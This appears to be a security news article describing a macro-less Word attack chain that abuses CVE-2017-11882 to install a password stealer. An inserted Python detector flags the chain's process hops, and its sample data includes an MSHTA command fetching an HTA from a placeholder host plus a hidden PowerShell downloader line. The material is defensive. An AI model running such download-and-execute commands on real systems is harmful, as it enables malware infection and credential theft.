
Spam distributors are using a new technique to infect users with malware, and while this attack relies on having users open Word documents, it does not involve users having to allow the execution of macro scripts.

This new macro-less technique is currently under active exploitation, being detected by Trustwave SpiderLabs researchers in an ongoing malware campaign.

The company says crooks are using this multi-phase, no-macros technique to infect users with a password stealer. Currently, evidence suggests only one group is using this novel trick, albeit this will surely be adopted by others.

New technique's exploitation chain

The actual exploitation chain is detailed below and relies on a large number of resources, such as DOCX, RTF, HTA, VBScript, and PowerShell.

⏩  A victim receives a spam email with a DOCX file attachment.
⏩  Victim downloads and opens the DOCX file.
⏩  DOCX file contains an embedded OLE object.
⏩  OLE object downloads and opens an RTF (disguised as a DOC) file.
⏩  DOC file uses CVE-2017-11882 Office Equation Editor vulnerability.
⏩  Exploit code runs an MSHTA command line.
⏩  MSHTA command line downloads and runs an HTA file.
⏩  HTA file contains a VBScript that unpacks a PowerShell script.
⏩  PowerShell script downloads and installs the password stealer.
⏩  Malware steals passwords from browsers, email and FTP clients.
⏩  Malware uploads data to a remote server.
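As an added illustration (not code from the article or the Trustwave report), the following detector walks constructed process-creation records and flags the parent/child hops this chain relies on: Equation Editor spawning MSHTA, MSHTA being handed a URL, and MSHTA spawning PowerShell. It assumes Equation Editor runs as EQNEDT32.EXE and that the sample paths and URL are placeholders; none of those values come from the article.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (constructed, shaped like Sysmon event ID 1)."""
    parent_image: str
    image: str
    command_line: str

# (parent executable, child executable, chain step it corresponds to)
CHAIN_RULES = (
    ("eqnedt32.exe", "mshta.exe", "Equation Editor exploit runs MSHTA"),
    ("mshta.exe", "powershell.exe", "HTA/VBScript unpacks PowerShell"),
)

def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def mshta_fetches_remote(ev: ProcEvent) -> bool:
    """MSHTA given a URL on its command line (the 'downloads and runs an HTA' step)."""
    cl = ev.command_line.lower()
    return basename(ev.image) == "mshta.exe" and ("http://" in cl or "https://" in cl)

def match_chain(events):
    """Return (step, event) pairs for every event that matches a chain rule."""
    hits = []
    for ev in events:
        p, c = basename(ev.parent_image), basename(ev.image)
        for parent, child, step in CHAIN_RULES:
            if p == parent and c == child:
                hits.append((step, ev))
        if mshta_fetches_remote(ev):
            hits.append(("MSHTA downloads remote HTA", ev))
    return hits

def chain_score(events) -> int:
    """Distinct chain steps observed; two or more is the multi-stage pattern."""
    return len({step for step, _ in match_chain(events)})

# Constructed sample: benign launches plus the hops the chain relies on (assumed paths).
EQNEDT = r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
    ProcEvent(r"C:\Windows\System32\svchost.exe", EQNEDT, "EQNEDT32.EXE"),
    ProcEvent(EQNEDT, r"C:\Windows\System32\mshta.exe",
              "mshta http://placeholder.invalid/stage.hta"),  # placeholder URL
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -WindowStyle Hidden -Command <placeholder downloader>"),
]
```

Running `match_chain(SAMPLE_EVENTS)` yields three hits covering three distinct steps, while the first two (benign) events alone score zero.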

New Word attack modus operandi

Trustwave says it has seen this trick used with malicious documents arriving via emails with the following subject lines, albeit many of these will likely change by tomorrow or next week.

TNT STATEMENT OF ACCOUNT – {random numbers}...............
Request for Quotation (RFQ) - < {random numbers} >
Telex Transfer Notification

The only way to stay safe is to break this new technique's exploitation chain at some point. The easiest way to do that is to keep Windows and Office up to date.

Microsoft's January 2018 Patch Tuesday security updates included a patch that removed part of the Equation Editor's functionality in order to mitigate CVE-2017-11882.

IOCs are available in the Trustwave report detailing this new attack.